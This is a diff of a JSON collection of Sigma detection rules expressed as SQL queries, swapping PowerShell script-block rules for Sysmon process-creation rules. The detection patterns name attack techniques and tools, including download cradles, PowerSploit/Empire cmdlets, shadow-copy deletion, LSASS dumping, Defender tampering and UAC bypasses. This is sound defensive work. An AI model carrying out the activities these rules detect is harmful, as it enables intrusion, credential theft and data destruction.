"attack.t1059.001" - ], - "falsepositives": [ - "Administrative scripts that use the same keywords." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" - ], - "filename": "posh_ps_wmimplant.yml" - }, - { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "status": "experimental", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ + "attack.defense_evasion", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE 